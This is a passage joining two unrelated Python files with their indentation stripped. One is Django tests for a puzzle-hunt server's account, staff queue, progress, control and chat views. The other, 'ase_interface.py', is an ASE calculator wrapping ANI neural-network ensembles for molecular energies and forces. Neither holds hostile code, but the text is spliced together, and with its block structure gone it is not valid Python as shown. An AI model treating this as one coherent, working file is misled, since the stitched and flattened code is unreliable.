META = {"Shib-Identity-Provider": 'https://login.cmu.edu/idp/shibboleth',
"eppn": "user@andrew.cmu.edu", "givenName": "", "sn": "User"}
response = self.client.get(reverse('huntserver:new_shib_account'), **META)
self.assertEqual(response.status_code, 200)
# Proper shib response, should succeed
META = {"Shib-Identity-Provider": 'https://login.cmu.edu/idp/shibboleth',
"eppn": "user@andrew.cmu.edu", "givenName": "Test",
"sn": "User"}
response = self.client.get(reverse('huntserver:new_shib_account'), **META)
self.assertEqual(response.status_code, 200)
# Username is empty, should fail
post_context = {'first_name': "Test", 'last_name': "User",
'username': "",
'email': 'user@andrew.cmu.edu',
'phone': "777-777-7777",
'allergies': "something"}
response = self.client.post(reverse('huntserver:new_shib_account'), post_context, **META)
self.assertEqual(response.status_code, 200)
# Proper post request, should succeed
post_context = {'first_name': "Test", 'last_name': "User",
'username': "user@andrew.cmu.edu",
'email': 'user@andrew.cmu.edu',
'phone': "777-777-7777",
'allergies': "something"}
response = self.client.post(reverse('huntserver:new_shib_account') + "?next=// ",
post_context, **META)
self.assertEqual(response.status_code, 302)
@override_settings(RATELIMIT_ENABLE=False)
class StaffTests(TestCase):
fixtures = ["basic_hunt"]
def test_staff_queue(self):
"Test the staff queue view"
login(self, 'admin')
response = get_and_check_page(self, 'huntserver:queue', 200)
response = ajax_and_check_page(self, 'huntserver:queue', 200,
{'last_date': '2000-01-01T01:01:01.001Z'})
puzzle = models.Puzzle.objects.all()[0]
team = models.Team.objects.all()[0]
s = models.Submission.objects.create(submission_text="bad answer", puzzle=puzzle,
submission_time=timezone.now(), team=team)
post_context = {'response': "Wrong answer", 'sub_id': str(s.pk)}
response = self.client.post(reverse('huntserver:queue'), post_context)
self.assertEqual(response.status_code, 200)
post_context = {'response': "Wrong answer", 'sub_id': ""}
response = self.client.post(reverse('huntserver:queue'), post_context)
self.assertEqual(response.status_code, 400)
def test_staff_queue_args(self):
"Test the staff paged queue view"
login(self, 'admin')
response = self.client.get(reverse('huntserver:queue'),
{"page_num": "1", "team_id": "18", "puzzle_id": "12"})
self.assertEqual(response.status_code, 200)
def test_staff_progress(self):
"Test the staff progress view"
login(self, 'admin')
response = get_and_check_page(self, 'huntserver:progress', 200)
ajax_args = {'last_solve_pk': '0', 'last_submission_pk': '0', 'last_unlock_pk': '0'}
response = ajax_and_check_page(self, 'huntserver:progress', 200, ajax_args)
response = ajax_and_check_page(self, 'huntserver:progress', 404, {'last_solve_pk': '1'})
solve_puzzle_from_admin(self)
response = ajax_and_check_page(self, 'huntserver:progress', 200, ajax_args)
response = get_and_check_page(self, 'huntserver:progress', 200)
post_context = {'action': "unlock", 'team_id': "5", 'puzzle_id': "202"}
response = self.client.post(reverse('huntserver:progress'), post_context)
self.assertEqual(response.status_code, 200)
post_context = {'action': "unlock", 'team_id': "5", 'puzzle_id': "202"}
response = self.client.post(reverse('huntserver:progress'), post_context)
self.assertEqual(response.status_code, 200)
post_context = {'action': "unlock_all", 'puzzle_id': "5"}
response = self.client.post(reverse('huntserver:progress'), post_context)
self.assertEqual(response.status_code, 200)
post_context = {}
response = self.client.post(reverse('huntserver:progress'), post_context)
self.assertEqual(response.status_code, 400)
def test_staff_charts(self):
"Test the staff charts view"
login(self, 'admin')
get_and_check_page(self, 'huntserver:charts', 200)
solve_puzzle_from_admin(self)
get_and_check_page(self, 'huntserver:charts', 200)
def test_staff_control(self):
"Test the staff control view"
class NoLogHandler(SimpleHTTPRequestHandler):
def log_message(self, format, *args):
return
server = HTTPServer(("localhost", 8898), NoLogHandler)
mock_server_thread = Thread(target=server.serve_forever)
mock_server_thread.setDaemon(True)
mock_server_thread.start()
login(self, 'admin')
post_context = {'action': "initial"}
response = self.client.post(reverse('huntserver:control'), post_context)
self.assertEqual(response.status_code, 302)
post_context = {'action': "reset"}
response = self.client.post(reverse('huntserver:control'), post_context)
self.assertEqual(response.status_code, 302)
post_context = {'action': "getpuzzles", "hunt_number": "1"}
response = self.client.post(reverse('huntserver:control'), post_context)
self.assertEqual(response.status_code, 200)
post_context = {'action': "getpuzzles", "puzzle_number": "1", "puzzle_id": "201"}
response = self.client.post(reverse('huntserver:control'), post_context)
self.assertEqual(response.status_code, 200)
post_context = {'action': "new_current_hunt", "hunt_number": "1"}
response = self.client.post(reverse('huntserver:control'), post_context)
self.assertEqual(response.status_code, 302)
post_context = {'action': "foobar"}
response = self.client.post(reverse('huntserver:control'), post_context)
self.assertEqual(response.status_code, 404)
def test_staff_emails(self):
"Test the staff email view"
login(self, 'admin')
response = get_and_check_page(self, 'huntserver:emails', 200)
post_context = {'subject': "test_subject", 'message': "test_message"}
response = self.client.post(reverse('huntserver:emails'), post_context)
self.assertEqual(response.status_code, 302)
def test_staff_management(self):
"Test the staff management view"
login(self, 'admin')
get_and_check_page(self, 'huntserver:hunt_management', 200)
def test_staff_info(self):
"Test the staff info view"
login(self, 'admin')
get_and_check_page(self, 'huntserver:hunt_info', 200)
def test_staff_chat(self):
"Test the staff progress view"
login(self, 'admin')
ajax_args = {'last_pk': '0'}
response = ajax_and_check_page(self, 'huntserver:admin_chat', 200, ajax_args)
response = get_and_check_page(self, 'huntserver:admin_chat', 200)
post_context = {'team_pk': "", 'is_announcement': "false",
'is_response': "true", 'message': "my simple message"}
response = self.client.post(reverse('huntserver:admin_chat'), post_context)
self.assertEqual(response.status_code, 400)
post_context = {'team_pk': "2", 'is_announcement': "true",
'is_response': "true", 'message': "my simple message"}
response = self.client.post(reverse('huntserver:admin_chat'), post_context)
self.assertEqual(response.status_code, 200)
post_context = {'team_pk': "2", 'is_announcement': "false",
'is_response': "true", 'message': "my simple message"}
response = self.client.post(reverse('huntserver:admin_chat'), post_context)
self.assertEqual(response.status_code, 200)
login(self, 'user1')
post_context = {'team_pk': "2", 'is_announcement': "false",
'is_response': "false", 'message': "my simple message"}
response = self.client.post(reverse('huntserver:chat'), post_context)
self.assertEqual(response.status_code, 200)
login(self, 'admin')
response = ajax_and_check_page(self, 'huntserver:admin_chat', 200, ajax_args)
def test_admin_pages(self):
"Test the admin page for team objects"
login(self, 'admin')
response = self.client.get(reverse('admin:huntserver_team_change', args=(1,)))
self.assertEqual(response.status_code, 200)
response = self.client.get(reverse('admin:huntserver_puzzle_change', args=(1,)))
self.assertEqual(response.status_code, 200)
response = self.client.get(reverse('admin:huntserver_hunt_change', args=(1,)))
self.assertEqual(response.status_code, 200)
"""
admin.py
Saving models
hunt_views.py
puzzle view submission with no team
puzzle view submission with excecption case?
puzzle view ajax with no team
puzzle view ajax with exception case?
chat view ajax something about messages?
info_views.py
registration view with team name update
models.py
check if serialize for ajax is still needed/used (if so, use it)
unicode on all models
staff_views.py
queue page exceptions (not possible?)
progress ajax as non-staff (not possible?)
progress normal page with no submissions
bootstrap_tags.py
call the tag with bad data?
utils.py
download puzzles but directory doesn't exist
values exception in parse_attributes
Plan:
- Attempt P2.7, P3.6, D1.8 D1.9 D1.10 D1.11 D1.12 D2.0 D2.1
- Fix things until step 3 works
"""
|
ase_interface.py | import numpy as np
import os, sys
from math import sqrt
import math
import time
import types
from ase.units import Bohr
from ase.calculators.calculator import Calculator, all_changes
from ase.neighborlist import NeighborList
try:
from ased3._d3 import d3
d3present = True
except ImportError:
print('van Der Waals correction will be unavailable. Please install ased3')
d3present = False
pass
import pyNeuroChem as pync
import multiprocessing
from multiprocessing import Process, Value, Array, Queue
# ANI energy a.u. to eV conversion
global conv_au_ev
conv_au_ev = 27.21138505
#import numpy as np
#import matplotlib.mlab as mlab
#import matplotlib.pyplot as plt
class ANI(Calculator):
implemented_properties = ['energy', 'forces', 'stress']
#implemented_properties = ['energy', 'forces']
default_parameters = {'xc': 'ani'}
nolabel = True
def __init__(self, build=True,gpuid=0,reslist=[],**kwargs):
Calculator.__init__(self, **kwargs)
if build:
anipath = os.path.dirname(__file__)
cnstfile = anipath + '/../ani-1x_dft_x8ens/rHCNO-5.2R_16-3.5A_a4-8.params'
saefile = anipath + '/../ani-1x_dft_x8ens/sae_linfit.dat'
nnfdir = anipath + '/../ani-1x_dft_x8ens/train0/networks/'
self.nc = pync.molecule(cnstfile, saefile, nnfdir, gpuid)
self.Setup=True
self.reslist=reslist
def setnc(self,nc):
self.nc = nc
def calculate(self, atoms=None, properties=['energy'],
system_changes=all_changes):
Calculator.calculate(self, atoms, properties, system_changes)
#start_time2 = time.time()
## make up for stress
## TODO
#stress_ani = np.zeros((1, 3))
stress_ani = np.zeros(6)
if self.Setup or self.nc.request_setup():
#Setup molecule for MD
natoms = len(self.atoms)
atom_symbols = self.atoms.get_chemical_symbols()
xyz = self.atoms.get_positions()
self.nc.setMolecule(coords=xyz.astype(np.float32),types=atom_symbols)
self.nc.setPBC(self.atoms.get_pbc()[0],self.atoms.get_pbc()[1],self.atoms.get_pbc()[2])
self.Setup=False
else:
xyz = self.atoms.get_positions()
# Set the conformers in NeuroChem
self.nc.setCoordinates(coords=xyz.astype(np.float32))
# TODO works only for 3D periodic. For 1,2D - update np.zeros((3,3)) part
pbc_inv = (np.linalg.inv(self.atoms.get_cell())).astype(np.float32) if atoms.pbc.all() else np.zeros((3,3), dtype=np.float32)
self.nc.setCell((self.atoms.get_cell()).astype(np.float32), pbc_inv)
#self.nc.setCell((self.atoms.get_cell()).astype(np.float32),(np.linalg.inv(self.atoms.get_cell())).astype(np.float32))
#start_time2 = time.time()
self.results['energy'] = conv_au_ev*self.nc.energy()[0]
if 'forces' in properties:
forces = conv_au_ev*self.nc.force()
# restrain atoms
for i in self.reslist:
forces[i] = 0.0
self.results['forces'] = forces
self.results['stress'] = conv_au_ev*stress_ani
#end_time2 = time.time()
#print('ANI Time:', end_time2 - start_time2)
def __update_neighbors(self):
#print('------------------------')
#szs = []
#an = self.atoms.get_atomic_numbers()
for a in range(0,len(self.atoms)):
indices,offsets = self.nlR.get_neighbors(a)
#if an[a] == 8:
#print(an[a])
#szs.append(len(indices))
self.nc.setNeighbors(ind=a,indices=indices.astype(np.int32),offsets=offsets.astype(np.float32))
#indices, offsets = self.nlR.get_neighbors(302)
#f = open('test2.xyz','w')
#f.write(str(len(indices))+'\n')
#f.write(" comment\n")
#an = self.atoms.get_atomic_numbers()
#for i, offset in zip(indices, offsets):
# xyz = self.atoms.positions[i]
# f.write(str(an[i]) + ' ' + str(xyz[0]) + ' ' + str(xyz[1]) + ' ' + str(xyz[2]) + '\n')
#print(szs)
#plt.hist(szs, max(szs)-min(szs), normed=1, facecolor='green', alpha=0.75)
#plt.xlabel('Number of neighbors')
#plt.ylabel('Count')
#plt.show()
#print('------------------------')
def get_atomicenergies(self, atoms=None, properties=['energy'],
system_changes=all_changes):
Calculator.calculate(self, atoms, properties, system_changes)
## make up for stress
## TODO
stress_ani = np.zeros((1, 3))
if self.Setup or self.nc.request_setup():
# Setup molecule for MD
natoms = len(self.atoms)
atom_symbols = self.atoms.get_chemical_symbols()
xyz = self.atoms.get_positions()
self.nc.setMolecule(coords=xyz.astype(np.float32), types=atom_symbols)
self.Setup = False
else:
xyz = self.atoms.get_positions()
# Set the conformers in NeuroChem
self.nc.setCoordinates(coords=xyz.astype(np.float32))
self.nc.energy()
return self.nc.aenergies(True) * conv_au_ev
##-------------------------------------
## Molecule worker class
##--------------------------------------
def molecule_worker(task_queue, gpuid, net_list, energy, forces, net_dict):
print('Building...')
ncl = [pync.molecule(net_dict['cns'], net_dict['sae'], net_dict['nnf'] + str(i) + '/networks/', gpuid, False) for i
in net_list]
Nn = net_dict['Nn']
if net_dict['epw']:
for nc in ncl:
nc.setPairWise()
set_pbc = False
Sp = []
while True:
next_task = task_queue.get()
if next_task is None:
# Poison pill means shutdown
time.sleep(1)
print ('Exiting')
task_queue.task_done()
break
if not set_pbc:
pbc = next_task['pbc']
for i, netid in enumerate(net_list):
#print('PBC:',pbc)
ncl[i].setPBC(pbc[0], pbc[1], pbc[2])
set_pbc=True
# Atomic elements
S = next_task['S']
# Cell
cell = next_task['cell']
# pbc_inv
pinv = next_task['pinv']
# make it two-dimensional
for i, netid in enumerate(net_list):
# Set the molecule/coordinates
if Sp == S:
if 'bynet' in next_task:
ncl[i].setCoordinates(coords=next_task['X'][netid].astype(np.float32))
else:
ncl[i].setCoordinates(coords=next_task['X'].astype(np.float32))
else:
if 'bynet' in next_task:
ncl[i].setMolecule(next_task['X'][netid].astype(np.float32), S)
else:
ncl[i].setMolecule(next_task['X'].astype(np.float32), S)
# Set the cell
ncl[i].setCell(cell, pinv)
#print('CELL:',cell)
energy[netid] = ncl[i].energy().copy()
forces[netid] = ncl[i].force().copy()
#if netid == 0 and net_dict['epw']:
#energy[netid] += ncl[i].pwenergy()
#forces[netid] += ncl[i].pwforce()
#print(ncl[i].pwenergy().copy())
#print(-ncl[i].pwforce().copy()[0])
if net_dict['epw']:
energy[netid+Nn] = ncl[i].pwenergy().copy()
forces[netid+Nn] = ncl[i].pwforce().copy()
Sp = S
task_queue.task_done()
return
##-------------------------------------
## Class for ANI ensemble prediction
##--------------------------------------
class ensemblemolecule_multigpu(object):
def __init__(self, cnstfile, saefile, nnfprefix, Nnet, gpu_list=0, sinet=False, forcesigma=False, enablepairwise=False):
# Number of networks
self.Nn = Nnet
if not isinstance(gpu_list, list):
gpu_list = [gpu_list]
# Build network dict
self.netdict = {'cns': cnstfile,
'sae': saefile,
'nnf': nnfprefix,
'Nn' : self.Nn,
'epw': enablepairwise}
# number of cores
self.cores = len(gpu_list)
# Build task list
self.task_list = [multiprocessing.JoinableQueue() for i in range(self.cores)]
# Construct working containers
self.manager = multiprocessing.Manager()
self.forces = self.manager.list()
if self.netdict['epw']:
self.energy = Array('d', range(2*self.Nn))
self.forces[:] = [[] for i in range(2*self.Nn)]
else:
self.energy = Array('d', range(self.Nn))
self.forces[:] = [[] for i in range(self.Nn)]
# Construct threads with pyNeuroChem molecule classes
self.p_list = []
for i in range(self.cores):
self.net_list = [j + int(self.Nn / self.cores) * i for j in range(int(self.Nn / self.cores))]
self.p_list.append(
Process(target=molecule_worker, args=(self.task_list[i], gpu_list[i], self.net_list, self.energy, self.forces, self.netdict)))
self.p_list[-1].start()
def request_setup(self):
return False
def set_molecule(self, X, S):
self.S = S
self.set_coordinates(X)
self.Na = len(S)
def set_coordinates(self, X):
self.X = X
def set_pbc(self, pbc0, pbc1, pbc2):
self.pbc = [pbc0, pbc1, pbc2]
def set_cell(self, cell, pbc_inv):
self.cell = cell
self.pinv = pbc_inv
def compute_props(self):
data_dict = {'X': self.X,
'S': self.S,
'pbc' : self.pbc,
'cell' : self.cell,
'pinv' : self.pinv}
if self.netdict['epw']:
self.forces[:] = [[] for i in range(2*self.Nn)]
else:
self.forces[:] = [[] for i in range(self.Nn)]
# Launch Jobs
for i in range(self.cores):
self.task_list[i].put(data_dict)
# Wait for jobs
for i in range(self.cores):
self.task_list[i].join()
self.E = np.array(self.energy[:])
self.F = np.stack(self.forces[:])
return self.E, self.F
def compute_props_by_net(self, X, S):
data_dict = {'X': X,
'S': S,
'pbc' : self.pbc,
'cell' : self.cell,
'pinv' : self.pinv,
'bynet': True}
if self.netdict['epw']:
self.forces[:] = [[] for i in range(2*self.Nn)]
else:
self.forces[:] = [[] for i in range(self.Nn)]
# Launch Jobs
for i in range(self.cores):
self.task_list[i].put(data_dict)
# Wait for jobs
for i in range(self.cores):
self.task_list[i].join()
self.E = np.array(self.energy[:])
self.F = np.stack(self.forces[:])
return self.E, self.F
def compute_mean_props(self, disable_ani=False):
data_dict = {'X': self.X,
'S': self.S,
'pbc' : self.pbc,
'cell' : self.cell,
'pinv' : self.pinv}
if self.netdict['epw']:
self.forces[:] = [[] for i in range(2*self.Nn)]
else:
self.forces[:] = [[] for i in range(self.Nn)]
# Launch Jobs
for i in range(self.cores):
self.task_list[i].put(data_dict)
# Wait for jobs
for i in range(self.cores):
self.task_list[i].join()
self.E = np.array(self.energy[:])
self.F = np.stack(self.forces[:])
self.intermediates = dict()
if self.netdict['epw']:
if disable_ani:
Et = self.E[self.Nn:]
Ft = self.F[self.Nn:]
else:
Et = self.E[:self.Nn] + self.E[self.Nn:]
Ft = self.F[:self.Nn] + self.F[self.Nn:]
self.intermediates['Eele'] = np.mean(self.E[:self.Nn], axis=0)
self.intermediates['Epws'] = np.mean(self.E[self.Nn:], axis=0)
self.intermediates['Fele'] = np.mean(self.F[:self.Nn], axis=0)
self.intermediates['Fpws'] = np.mean(self.F[self.Nn:], axis=0)
else:
if disable_ani:
self.E = 0.0 * self.E
self.F = 0.0 * self.F
Et = self.E
Ft = self.F
# dF and C
dF = Ft - np.mean(Ft, axis=0)[np.newaxis, :, :]
# Compute var sqr
v2 = np.sum(np.sum(np.power(dF, 2), axis=0) / (self.Nn * (self.Nn - 1)))
# Store intermediates
self.intermediates['var_sqr'] = v2
return np.mean(Et, axis=0), np.mean(Ft, axis=0), np.std(Et, axis=0) / np.sqrt(float(self.Na)), np.mean(np.std(Ft, axis=0))
def compute_sigma_bias_potential(self, X, S, Efunc, Ffunc, epsilon=0.001, disable_ani=False):
if self.Nn < 2:
print('Error: compute_sigma_bias_potential requires more than 1 network in the ensemble.')
raise ValueError
# Initial Force
self.set_molecule(X, S)
E, F = self.compute_props()
# dF and C
dF = F - np.mean(F, axis=0)[np.newaxis, :, :]
# Forward calc
E1, F1 = self.compute_props_by_net(X[np.newaxis, :, :] + epsilon * dF, S)
# Backward calc
E2, F2 = self.compute_props_by_net(X[np.newaxis, :, :] - epsilon * dF, S)
# Computer ds/dx via central difference
ds = np.sum((F1 - F2) / epsilon, axis=0) / (self.Nn * (self.Nn - 1))
# Compute var sqr
v2 = np.sum(np.sum(np.power(dF, 2), axis=0) / (self.Nn * (self.Nn - 1)))
E_bias = Efunc(v2)
F_bias = Ffunc(v2, ds)
Eani = np.mean(E, axis=0)
Fani = np.mean(F, axis=0)
self.intermediates = {'Ebias': E_bias,'Eani': Eani,'Fbias': F_bias,'Fani': Fani,'var_sqr': v2}
if not disable_ani:
return E_bias+Eani, F_bias+Fani, np.std(E, axis=0) / np.sqrt(float(self.Na)), np.mean(np.std(F, axis=0))
else:
return E_bias, F_bias, np.std(E, axis=0) / np.sqrt(float(self.Na)), np.mean(np.std(F, axis=0))
def cleanup(self):
# Add a poison pill for each consumer
for task, in zip(self.task_list):
task.put(None)
#for proc in zip(self.p_list):
# proc.join()
def __del__(self):
self.cleanup()
##-------------------------------------
## Class for ANI ensemble prediction
##--------------------------------------
class ensemblemolecule(object):
def __init__(self, cnstfile, saefile, nnfprefix, Nnet, gpuid=0, sinet=False, forcesigma=False):
# Number of networks
self.Nn = Nnet
# Construct pyNeuroChem molecule classes
self.ncl = [pync.molecule(cnstfile, saefile, nnfprefix + str(i) + '/networks/', gpuid, sinet) for i in
range(self.Nn)]
def set_molecule(self, X, S):
for nc in self.ncl:
nc.setMolecule(coords=np.array(X,dtype=np.float32), types=list(S))
self.E = np.zeros((self.Nn), dtype=np.float64)
self.F = np.zeros((self.Nn, X.shape[0], X.shape[1]), dtype=np.float32)
self.Q = np.zeros((self.Nn, X.shape[0],), dtype=np.float32)
self.Na = X.shape[0]
def set_molecule_per_net(self, X, S):
for nc,x in zip(self.ncl,X):
nc.setMolecule(coords=np.array(x,dtype=np.float32), types=list(S))
self.E = np.zeros((self.Nn), dtype=np.float64)
self.F = np.zeros((self.Nn, X.shape[1], X.shape[2]), dtype=np.float32)
self.Na = X.shape[0]
def request_setup(self):
return self.ncl[0].request_setup()
def set_coordinates(self, X):
for nc in self.ncl:
nc.setCoordinates(coords=X.astype(np.float32))
def set_pbc(self, pbc0, pbc1, pbc2):
for nc in self.ncl:
nc.setPBC(pbc0, pbc1, pbc2)
def set_cell(self, cell, pbc_inv):
for nc in self.ncl:
nc.setCell(cell, pbc_inv)
def compute_stddev_molecule(self, X):
for i, nc in enumerate(self.ncl):
nc.setCoordinates(coords=X)
self.E[i] = nc.energy()[0]
sigma = np.std(self.E, axis=0) / np.sqrt(float(self.Na))
return sigma
def compute_props(self):
for i, nc in enumerate(self.ncl):
self.E[i] = nc.energy().copy()
self.F[i] = nc.force().copy()
return self.E.copy(), self.F.copy()
def compute_energies(self):
for i, nc in enumerate(self.ncl):
self.E[i] = nc.energy().copy()
return self.E.copy()
def compute_aenergies(self,sae):
Ea = np.zeros((self.Nn,self.Na),dtype=np.float64)
for i, nc in enumerate(self.ncl):
Ea[i,:] = nc.aenergies(sae).copy()
return Ea
def compute_mean_props(self, disable_ani=False):
for i, nc in enumerate(self.ncl):
self.E[i] = nc.energy().copy()
self.F[i] = nc.force().copy()
if disable_ani:
self.E[i] = 0.0*self.E[i]
self.F[i] = 0.0*self.F[i]
# dF and C
dF = self.F - np.mean(self.F, axis=0)[np.newaxis, :, :]
# Compute var sqr
v2 = np.sum(np.sum(np.power(dF, 2), axis=0) / (self.Nn * (self.Nn - 1)))
# Store intermediates
self.intermediates = {'var_sqr': v2}
# Return
return np.mean(self.E, axis=0), np.mean(self.F, axis=0), np.std(self.E, axis=0) / np.sqrt(float(self.Na)), np.mean(np.std(self.F, axis=0))
def compute_mean_energies(self):
for i, nc in enumerate(self.ncl):
self.E[i] = nc.energy().copy()
return np.mean(self.E, axis=0), np.std(self.E, axis=0) / np.sqrt(float(self.Na))
def compute_mean_charges(self):
for i, nc in enumerate(self.ncl):
self.Q[i,:] = nc.get_charges().copy()
return np.mean(self.Q, axis=0), np.std(self.Q, axis=0)
def compute_sigma_bias_potential(self, X, S, Efunc, Ffunc, epsilon=0.001, disable_ani=False):
if self.Nn < 2:
print('Error: compute_sigma_bias_potential requires more than 1 network in the ensemble.')
raise ValueError
# Initial Force
self.set_molecule(X, S)
E, F = self.compute_props()
# dF and C
dF = F - np.mean(F, axis=0)[np.newaxis, :, :]
# Forward calc
self.set_molecule_per_net(X[np.newaxis, :, :] + epsilon * dF, S)
E1, F1 = self.compute_props()
# Backward calc
self.set_molecule_per_net(X[np.newaxis, :, :] - epsilon * dF, S)
E2, F2 = self.compute_props()
# Computer ds/dx via central difference
ds = np.sum((F1 - F2) / epsilon, axis=0) / (self.Nn * (self.Nn - 1))
# Compute var sqr
v2 = np.sum(np.sum(np.power(dF, 2), axis=0) / (self.Nn * (self.Nn - 1)))
E_bias = Efunc(v2)
F_bias = Ffunc(v2, ds)
Eani = np.mean(E, axis=0)
Fani = np.mean(F, axis=0)
self.intermediates = {'Ebias': E_bias,'Eele': Eani,'Fbias': F_bias,'Fele': Fani,'var_sqr': v2}
if not disable_ani:
return E_bias+Eani, F_bias+Fani, np.std(E, axis=0) / np.sqrt(float(self.Na)), np.max(np.std(F, axis=0))
else:
return E_bias, F_bias, np.std(E, axis=0) / np.sqrt(float(self.Na)), np.max(np.std(F, axis=0))
##-------------------------------------
## Cos cutoff functions
##--------------------------------------
def coscut(Rmag, iRc, sRc):
return 0.5 * np.cos(math.pi * (Rmag+sRc) * iRc) + 0.5
def dcoscut(Rmag, R, iRc, sRc):
return -0.5 * math.pi * iRc * np.sin(math.pi * iRc * (Rmag+sRc)) * R/Rmag
def tanhcut(Rmag, Shf):
return 0.5*np.tanh(-20*(Rmag-Shf)) + 0.5
def dtanhcut(Rmag, R, Shf):
#return 0.5*np.tanh(-20*(Rmag-Shf)) + 0.5
return -0.5*20*(1.0 - np.power(np.tanh(-20*(Rmag-Shf)),2)) * R/Rmag
##-------------------------------------
## ANI Ensemble ASE interface
##--------------------------------------
class ANIENS(Calculator):
implemented_properties = ['energy', 'forces', 'stress', 'dipole']
default_parameters = {'xc': 'ani'}
nolabel = True
### Constructor ###
def __init__(self, aniens, sdmax=sys.float_info.max, energy_conversion=conv_au_ev, **kwargs):
Calculator.__init__(self, **kwargs)
self.nc = aniens
self.energy_conversion = energy_conversion
self.sdmax = sdmax
self.Setup = True
self.nc_time=0.0
self.Epwise = None
self.Emodel = None
self.pwiter = True
self.pairwise = False
self.add_bias = False
self.hipmodels = None
self.ani_off = False
# Tortional Restraint List
self.tres = []
self.Xn = np.zeros((0,0,3), dtype=np.float64)
self.Dn = np.zeros((0,0,3), dtype=np.float64)
### Set the pairwise functions ###
def set_pairwise(self, Efunc, Ffunc):
self.Efunc = Efunc
self.Ffunc = Ffunc
self.pairwise = True
def set_sigmabias(self,bias_Efunc, bias_Ffunc, epsilon=0.001, disable_ani=False):
self.bias_Efunc = bias_Efunc
self.bias_Ffunc = bias_Ffunc
self.epsilon=epsilon
self.disable_ani_in_bias = disable_ani
self.add_bias=True
### Set HIPNN for dipole ###
def set_hipnn_dipole_model(self, hipmodels):
self.hipmodels = hipmodels
def resize_XnDn(self,ne):
if ne > self.Xn.shape[1]:
self.Xn = np.pad(self.Xn,((0, 0), (0, ne - self.Xn.shape[1]), (0, 0)), 'constant', constant_values=((0, 0), (0, 0), (0, 0)))
self.Dn = np.pad(self.Dn,((0, 0), (0, ne - self.Dn.shape[1]), (0, 0)), 'constant', constant_values=((0, 0), (0, 0), (0, 0)))
return self.Xn.shape[1]
def disable_ani(self):
self.ani_off = True
### Adds the pairwise energies/forces to the calculated ###
def add_pairwise(self, properties):
positions = self.atoms.get_positions()
mcut = 0.0
lcut = 2.5
if self.pwiter:
N = positions.shape[0]
self.nl = NeighborList(np.full(N, mcut/2.0), skin=0.25, self_interaction=False)
self.Xn = np.zeros((N, 0, 3), dtype=np.float64)
self.Dn = np.zeros((N, 0, 3), dtype=np.float64)
self.pwiter = False
#start_time = time.time()
self.nl.update(self.atoms)
Epairwise = 0.0
if 'forces' in properties:
Fpairwise = 0. * positions
# loop over all atoms in the cell
for ia, posa in enumerate(positions):
indices, offsets = self.nl.get_neighbors(ia)
#print('Neh/Dsp:', indices.shape, offsets.shape)
#nposition = positions[indices]
R = positions[indices] + np.dot(offsets, self.atoms.get_cell()) - posa[np.newaxis,:]
Rmag = np.linalg.norm(R,axis=1)
cidx = np.where( (Rmag >= lcut) & (Rmag < mcut) )
sidx = np.where(Rmag >= mcut)
E = self.Efunc(Rmag)
Ecut = coscut(Rmag[cidx], 1.0/(mcut-lcut), lcut)
#Ecut = tanhcut(Rmag[cidx], lcut-0.1*lcut)
E[cidx] = E[cidx]*Ecut
E[sidx] = 0.0*E[sidx]
Epairwise += E.sum() # Neighbors list supplies only neighbors once (NO DOUBLE COUNT)
if 'forces' in properties:
F = self.Ffunc(Rmag[:,np.newaxis],R)
F[cidx] = (E[cidx][:,np.newaxis]*dcoscut(Rmag[cidx][:,np.newaxis], R[cidx], 1.0/(mcut-lcut), lcut)+Ecut[:,np.newaxis]*F[cidx])
#F[cidx] = (E[cidx][:,np.newaxis]*dtanhcut(Rmag[cidx][:,np.newaxis], R[cidx], lcut-0.1*lcut)+Ecut[:,np.newaxis]*F[cidx])
F[sidx] = 0.0 * F[sidx]
Fpairwise[indices] += -F
Fpairwise[ia] += np.sum(F,axis=0)
self.results['energy'] += Epairwise
self.Epwise = Epairwise
if 'forces' in properties:
#print(Fpairwise.shape,np.sum(Fpairwise, axis=1))
#print(Fpairwise[0])
self.results['forces'] += Fpairwise
### Calculate function require by ASE ###
def calculate(self, atoms=None, properties=['energy'],
system_changes=all_changes):
Calculator.calculate(self, atoms, properties, system_changes)
## make up for stress
## TODO
# stress_ani = np.zeros((1, 3))
stress_ani = np.zeros(6)
## Check if models are initilized (first step)
if self.Setup or self.nc.request_setup():
# Setup molecule for MD
natoms = len(self.atoms)
atom_symbols = self.atoms.get_chemical_symbols()
xyz = self.atoms.get_positions()
self.nc.set_molecule(xyz.astype(np.float32), atom_symbols)
self.nc.set_pbc(bool(self.atoms.get_pbc()[0]), bool(self.atoms.get_pbc()[1]), bool(self.atoms.get_pbc()[2]))
# TODO works only for 3D periodic. For 1,2D - update np.zeros((3,3)) part
pbc_inv = (np.linalg.inv(self.atoms.get_cell())).astype(np.float32) if atoms.pbc.all() else np.zeros(
(3, 3), dtype=np.float32)
self.nc.set_cell((self.atoms.get_cell()).astype(np.float32), pbc_inv)
self.Setup = False
## Run this if models are initialized
else:
xyz = self.atoms.get_positions().astype(np.float32)
# Set the conformers in NeuroChem
self.nc.set_coordinates(xyz)
# TODO works only for 3D periodic. For 1,2D - update np.zeros((3,3)) part
pbc_inv = (np.linalg.inv(self.atoms.get_cell())).astype(np.float32) if atoms.pbc.all() else np.zeros(
(3, 3), dtype=np.float32)
self.nc.set_cell((self.atoms.get_cell()).astype(np.float32), pbc_inv)
## Compute the model properties (you can speed up ASE energy prediction by not doing force backprop unless needed.)
start_time = time.time()
if not self.add_bias:
energy, force, stddev, Fstddev = self.nc.compute_mean_props(disable_ani=self.ani_off)
self.Fstddev = Fstddev
else:
energy, force, stddev, Fstddev = self.nc.compute_sigma_bias_potential(self.atoms.get_positions().astype(np.float32),
self.atoms.get_chemical_symbols(),
self.bias_Efunc, self.bias_Ffunc,
epsilon=self.epsilon,
disable_ani=self.disable_ani_in_bias)
self.Fstddev=Fstddev
self.nc_time+=time.time() - start_time
## convert std dev to correct units
self.stddev = self.energy_conversion * stddev
## Store energies in ASE
self.results['energy'] = energy
self.Emodel = energy
## If forces are requested store forces
if 'forces' in properties:
forces = force
if len(self.tres) > 0:
for res in self.tres:
forces = hard_restrain_tortion_force(res, xyz, forces)
self.results['forces'] = forces
## Set stress tensor
self.results['stress'] = self.energy_conversion * stress_ani
## If the HIP-NN model is set run this for dipoles
if self.hipmodels is not None:
Z = self.atoms.get_atomic_numbers()
R = self.atoms.get_positions()
R = R.reshape([1,len(Z),3])
Z = Z.reshape([1, len(Z)]).astype(np.int32)
dipole = np.zeros((3),dtype=np.float32)
for hippy in self.hipmodels:
output = hippy.pred_fn([Z, R], shape_output=True)
dipole += output[1][0][0]
self.results['dipole'] = dipole/len(self.hipmodels)
## Compute pairwise if requested
if self.pairwise:
self.add_pairwise(properties)
## Convert energies and forces to requested units
self.results['energy'] = self.energy_conversion * self.results['energy']
